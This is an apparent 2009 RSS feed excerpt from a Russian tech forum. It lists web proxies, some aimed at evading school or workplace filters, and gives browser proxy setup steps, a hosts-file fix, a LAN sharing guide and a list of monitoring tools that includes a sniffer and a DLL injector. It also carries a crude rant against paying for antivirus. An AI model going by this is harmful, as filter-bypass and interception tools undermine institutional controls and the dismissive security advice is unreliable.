href=&quot;http://megaproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://megaproxy.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://amegaproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://amegaproxy.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.w3privacy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.w3privacy.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.anonymizer.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anonymizer.ru/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.the-cloak.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.the-cloak.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://proxify.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://proxify.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.snoopblocker.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.snoopblocker.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.long999.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.long999.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.calcmaster.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.calcmaster.net/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.idzap.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.idzap.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.goproxing.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.goproxing.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.merletn.org/anonymizer&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.merletn.org/anonymizer&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.proxymouse.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxymouse.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.proxywave.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxywave.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.vtunnel.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.vtunnel.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.freeproxy.ca/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.freeproxy.ca/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.hackingtruths.org/proxy&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.hackingtruths.org/proxy&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://xanproxy.be/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://xanproxy.be/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.proxyanon.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxyanon.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.anonproxy.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anonproxy.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.proxysafe.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxysafe.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.strongproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.strongproxy.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://surfonym.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://surfonym.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.browseatwork.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.browseatwork.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.anonymousurfing.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anonymousurfing.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.browsingwork.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.browsingwork.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.anotherproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anotherproxy.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.proxifyme.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxifyme.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.unblockthis.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.unblockthis.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.hidingyou.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.hidingyou.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.fsurf.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.fsurf.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.proxy-surf.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxy-surf.net/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.totalupload.com/surf/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.totalupload.com/surf/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.arandomproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.arandomproxy.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://proxynanny.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://proxynanny.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.anoniproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.anoniproxy.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://pleaseunblock.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://pleaseunblock.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.proxylord.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxylord.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.proxyindex.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxyindex.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.surf-anonymous.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.surf-anonymous.org/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.privacy-world.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.privacy-world.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.surf24h.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.surf24h.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://bywhat.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://bywhat.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://gothru.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://gothru.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.openupms.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.openupms.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.stupidschool.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.stupidschool.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.ianonymous.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.ianonymous.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://viewtheweb.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://viewtheweb.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://openblockers.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://openblockers.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://dontbestopped.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://dontbestopped.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.proxy4myspace.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.proxy4myspace.org/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.freedomtunnel.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.freedomtunnel.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://privatebrowse.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://privatebrowse.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://getonnow.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://getonnow.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://freemyurl.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://freemyurl.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://bypasslocks.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://bypasslocks.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.noipproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.noipproxy.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.myinternetproxy.com/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.myinternetproxy.com/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.surfinstantly.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.surfinstantly.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://worldwideunblocker.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://worldwideunblocker.info/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.iproxy.eu/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.iproxy.eu/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://www.blairstownnj.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.blairstownnj.org/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://bypassway.net/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://bypassway.net/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://289.us/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://289.us/&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://browsebrisk.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://browsebrisk.com&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://browsecrafty.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://browsecrafty.com&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://hidden4u.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://hidden4u.com&lt;/a&gt; &lt;br /&gt;&lt;a href=&quot;http://planetx5.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://planetx5.com&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;Попутно если достали Проксики то настроить их: &lt;/p&gt;
						&lt;p&gt;1. Настройка веб-прокси в Internet Explorer &lt;br /&gt;2. Откройте Internet Explorer. &lt;br /&gt;3. Откройте меню &amp;lt;Tools&amp;gt;. &lt;br /&gt;4. Выберите &amp;lt;Internet options&amp;gt;. &lt;br /&gt;5. Перейдите на вкладку &amp;lt;Connections&amp;gt;. &lt;br /&gt;6. Нажмите на кнопку &amp;lt;LAN Settings&amp;gt;. &lt;br /&gt;7. Установите флажок &amp;quot;Использовать прокси-сервер для подключений LAN&amp;quot;. &lt;br /&gt;8. Введите IP-адрес прокси-сервера вы выбрали в шаге 1, в поле &amp;quot;Адрес:&amp;quot; коробка. &lt;br /&gt;9. Введите номер порта прокси-сервера вы выбрали в шаге 1 в &amp;quot;Порт:&amp;quot; коробка. &lt;br /&gt;10. Нажмите кнопку &amp;lt;OK&amp;gt;. &lt;br /&gt;11. Нажмите кнопку &amp;lt;OK&amp;gt;. &lt;/p&gt;
						&lt;p&gt;Настройка веб-прокси в Mozilla Firefox &lt;/p&gt;
						&lt;p&gt;1. Откройте Firefox. &lt;br /&gt;2. Откройте меню &amp;lt;Tools&amp;gt;. &lt;br /&gt;3. Выберите &amp;lt;Options&amp;gt;. &lt;br /&gt;4. Нажмите кнопку &amp;lt;Connection Settings&amp;gt;. &lt;br /&gt;5. Проверьте &amp;lt;Manual прокси Configuration&amp;gt;. &lt;br /&gt;6. Введите IP-адрес прокси-сервера вы выбрали в шаге 1, в &amp;quot;HTTP-прокси:&amp;quot; коробка. &lt;br /&gt;7. Введите номер порта прокси-сервера вы выбрали в шаге 1, в соответствующих &amp;quot;Порт:&amp;quot; коробка. &lt;br /&gt;8. Введите IP-адрес прокси-сервера вы выбрали в шаге 1 в &amp;quot;SSL-прокси:&amp;quot; коробка. &lt;br /&gt;9. Введите номер порта прокси-сервера вы выбрали в шаге 1, в соответствующих &amp;quot;Порт:&amp;quot; коробка. &lt;br /&gt;10. Нажмите кнопку &amp;lt;OK&amp;gt;. &lt;br /&gt;11. Нажмите кнопку &amp;lt;OK&amp;gt;. &lt;/p&gt;
						&lt;p&gt;Настройка веб-прокси в Opera &lt;br /&gt;1. В главном меню выбираем &amp;quot;Tools&amp;quot;, подменю &amp;quot;Preferences&amp;quot; &lt;br /&gt;2. В новом окне с вертикальным меню слева выбираем &amp;quot;Network&amp;quot;, в появившейся панели справа жмем &amp;quot;Proxy servers&amp;quot; &lt;br /&gt;3. В следующем появившемся окне отмечаем галочками необходимые нам протоколы (можна все, но наиболее критичен к трафику обычно HTTP протокол. &lt;br /&gt;В строку адреса вводим proxy &lt;br /&gt;4. Давим &amp;quot;Apply&amp;quot;, &amp;quot;OK&amp;quot;, возвращаемся к исходному окну браузера.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 03:18:08 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=33#p33</guid>
		</item>
		<item>
			<title>Не открываются сайты ? Решение проблемы</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=32#p32</link>
			<description>&lt;p&gt;Т.к. часто появляются темы с таким вопросом, опишем один из вариантов решения проблемы. &lt;/p&gt;
						&lt;p&gt;Открываете блокнотом файл &amp;quot;C:\WINDOWS\system32\drivers\etc\hosts&amp;quot; &lt;br /&gt;Находите строку &amp;quot;127.0.0.1 localhost&amp;quot; и удаляете все строки после нее. &lt;br /&gt;Сохраняете. &lt;br /&gt;Закрываете браузер (если он был открыт). &lt;br /&gt;Открываете браузер и пробуете открыть сайт, который был недоступен. &lt;/p&gt;
						&lt;p&gt;Если не помогло можете задать вопрос здесь. &lt;br /&gt;Но перед этим открываете &amp;quot;Пуск&amp;quot; -&amp;gt; &amp;quot;Выполнить&amp;quot; -&amp;gt; вводите команду &amp;quot;cmd&amp;quot; -&amp;gt; нажимаете &amp;quot;Enter&amp;quot;. &lt;br /&gt;В открывшейся командной строке вводите &amp;quot;ping адрес_сайта&amp;quot; -&amp;gt; нажимаете &amp;quot;Enter&amp;quot; (например &amp;quot;ping wwwdrweb.ru&amp;quot;) &lt;/p&gt;
						&lt;p&gt;В данном случае результат выполнения команды ping выглядит так:&lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;C:\&amp;gt;ping wwwdrweb.ru &lt;/p&gt;
						&lt;p&gt;Обмен пакетами с wwwdrweb.ru [87.242.72.150] с 32 байтами данных: &amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt; --- здесь IP-адрес &lt;br /&gt;Ответ от 87.242.72.150: число байт=32 время=90мс TTL=56 &lt;br /&gt;Ответ от 87.242.72.150: число байт=32 время=90мс TTL=56 &lt;br /&gt;Ответ от 87.242.72.150: число байт=32 время=90мс TTL=56 &lt;br /&gt;Ответ от 87.242.72.150: число байт=32 время=90мс TTL=56 &lt;/p&gt;
						&lt;p&gt;Статистика Ping для 87.242.72.150: &lt;br /&gt;Пакетов: отправлено = 4, получено = 4, потеряно = 0 &lt;br /&gt;(0% потерь) &lt;br /&gt;Приблизительное время приема-передачи в мс: &lt;br /&gt;Минимальное = 90мсек, Максимальное = 90 мсек, Среднее = 90 мсек &lt;/p&gt;
						&lt;p&gt;C:\&amp;gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;В вопросе укажите результат выполнения команды, можно просто написать пингуемый IP-адрес (выделен выше жирным).&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 03:16:44 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=32#p32</guid>
		</item>
		<item>
			<title>Настройка совместного доступа к интернет.</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=31#p31</link>
			<description>&lt;p&gt;Поскольку данный процедура, вроде достаточно простая, вызывает много вопросов, то, пожалуй, тема будет полезна. Начинаем с простого. &lt;/p&gt;
						&lt;p&gt;Как настроить интернет на несколько компьютеров в локальной сети (для чайников). &lt;/p&gt;
						&lt;p&gt;Вариант первый: adsl-модем настроен в режим роутера. &lt;br /&gt;Для того, чтобы компьютеры в локальной сети имели доступ в интернет, достаточно просто указать IP-адрес модема в качестве основного шлюза в настройках сетевого соединения. &lt;br /&gt;Пуск – Панель управления – Сетевые подключения – Подключение по локальной сети, Свойства, закладка Общие – Протокол Интернета (TCP/IP). &lt;br /&gt;Интернет будет работать одновременно на всех компьютерах. &lt;/p&gt;
						&lt;p&gt;Вариант второй: adsl-модем в режиме brige. &lt;br /&gt;Для начала нужно подключить к интернету тот компьютер, который будет служить шлюзом для всех остальных. Создаем соединение, жмем кнопку Свойства, на закладке Дополнительно отмечаем галкой пункт «Разрешить пользователям сети использовать подключение к Интернету данного компьютера». &lt;br /&gt;На всех остальных компьютерах в настройках сетевого подключения указываем в качестве основного шлюза адрес этого компьютера. &lt;br /&gt;Интернет в этом случае будет работать на остальных компьютерах, когда установлено соединение на шлюзе. &lt;/p&gt;
						&lt;p&gt;Для тех, кого интересует настройка сети в Vista, весьма подробное описание: Настройка сети в Windows Vista. &lt;/p&gt;
						&lt;p&gt;Для начала хватит. Если надо – дополню скринами, для тех кто совсем на танке. Если нужно сделать подробнее – пишем сюда. &lt;br /&gt;Фак будет дополнятся описанием различных ситуаций и вопросов касательно общего доступа к интернет в локальной сети, проводной или wi-fi. Заявки и пожелания о том, что стоит добавить, пишем здесь либо в личку.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 03:14:57 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=31#p31</guid>
		</item>
		<item>
			<title>Антивирусники: нужны ли они?</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=30#p30</link>
			<description>&lt;p&gt;Люди спорят о чём угодно и об антивирусах тоже. &lt;br /&gt;Можно спорить об их нужности до усрачки. &lt;br /&gt;Но, платить за них - это надо быть &lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;font-size: 16px&quot;&gt;голимым конченым идиотом&lt;/span&gt;&lt;/span&gt;.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 03:11:47 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=30#p30</guid>
		</item>
		<item>
			<title>Программы для мониторинга системы</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=29#p29</link>
			<description>&lt;p&gt;На форуме часто появляются вопросы как и чем удалить и обнаружить вирус/троян/келогер/руткит и пр. &lt;/p&gt;
						&lt;p&gt;Решил выложить подборку программ которая не раз выручала. &lt;/p&gt;
						&lt;p&gt;Autorun 9.12 &lt;br /&gt;Позволяет просканиривать и редактировать практически весь автозапуск &lt;br /&gt;&lt;a href=&quot;http://technet.microsoft.com/en-us/sysinternals/bb963902.aspx&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://technet.microsoft.com/en-us/sysi &amp;#8230; 63902.aspx&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;FileMon for Windows v7.04 &lt;br /&gt;Позволяет отслеживать обращения всех процессов к файловой системе &lt;br /&gt;&lt;a href=&quot;http://technet.microsoft.com/en-us/sysinternals/bb896642.aspx&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://technet.microsoft.com/en-us/sysi &amp;#8230; 96642.aspx&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;RegMon for Windows v7.04 &lt;br /&gt;Позволяет отслеживать обращения всех процессов к реестру &lt;br /&gt;&lt;a href=&quot;http://technet.microsoft.com/en-us/sysinternals/bb896652.aspx&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://technet.microsoft.com/en-us/sysi &amp;#8230; 96652.aspx&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;Rootkit Unhooker LE 3.8.340.550 &lt;br /&gt;На данный момент самый лучший антируткит &lt;br /&gt;&lt;a href=&quot;http://dump.ru/file_catalog/1006853&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://dump.ru/file_catalog/1006853&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;RemoteDLL 1.3 &lt;br /&gt;позволяет подгружать и выгружать библиотеки из процессов &lt;br /&gt;&lt;a href=&quot;http://www.securityxploded.com/remotedll.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.securityxploded.com/remotedll.php&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;Advanced Process Termination v4.2 - DiamondCS &lt;br /&gt;Наверное лучший убийца процессов, позволяет это делать различными способами &lt;br /&gt;&lt;a href=&quot;http://dump.ru/file_catalog/1006872&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://dump.ru/file_catalog/1006872&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;WinServiceManager &lt;br /&gt;Удобный менеджер служб Windows &lt;br /&gt;&lt;a href=&quot;http://www.securityxploded.com/winservicemanager.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.securityxploded.com/winservicemanager.php&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;0x4553-Intercepter &lt;br /&gt;Сниффер сетевой активности &lt;br /&gt;&lt;a href=&quot;http://intercepter.nerf.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://intercepter.nerf.ru/&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;Process Monitor v1.37 &lt;br /&gt;Отличная замена TaskManager, с возможность построения дерева процессов &lt;br /&gt;&lt;a href=&quot;http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://technet.microsoft.com/en-us/sysi &amp;#8230; 96645.aspx&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;Антивирусная утилита AVZ - 4.30 &lt;br /&gt;&lt;a href=&quot;http://z-oleg.com/secur/avz/download.php&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://z-oleg.com/secur/avz/download.php&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;FileAlyzer© 1.6.0.4 &lt;br /&gt;Инструмент для просмотра и анализа содержимого файлов &lt;br /&gt;Включая файловые потоки!!! &lt;br /&gt;&lt;a href=&quot;http://www.safer-networking.org/files/filealyz.exe&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.safer-networking.org/files/filealyz.exe&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;mst IsUsedBy &lt;br /&gt;маленькая утилитка котороя позволяет узнать каким процессом занят файл &lt;br /&gt;&lt;a href=&quot;http://dump.ru/file_catalog/1006913&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://dump.ru/file_catalog/1006913&lt;/a&gt; &lt;/p&gt;
						&lt;p&gt;Unlocker 1.8.7 &lt;br /&gt;позволяет удалить заблокированные (используемые) файлы &lt;br /&gt;[link=http://ccollomb.free.fr/unlocker/#download]http://ccollomb.free.fr/unlocker/#download[/link] &lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;(Если ссылки не работают то к братику гуглу все!! :) )&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 03:09:08 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=29#p29</guid>
		</item>
	</channel>
</rss>
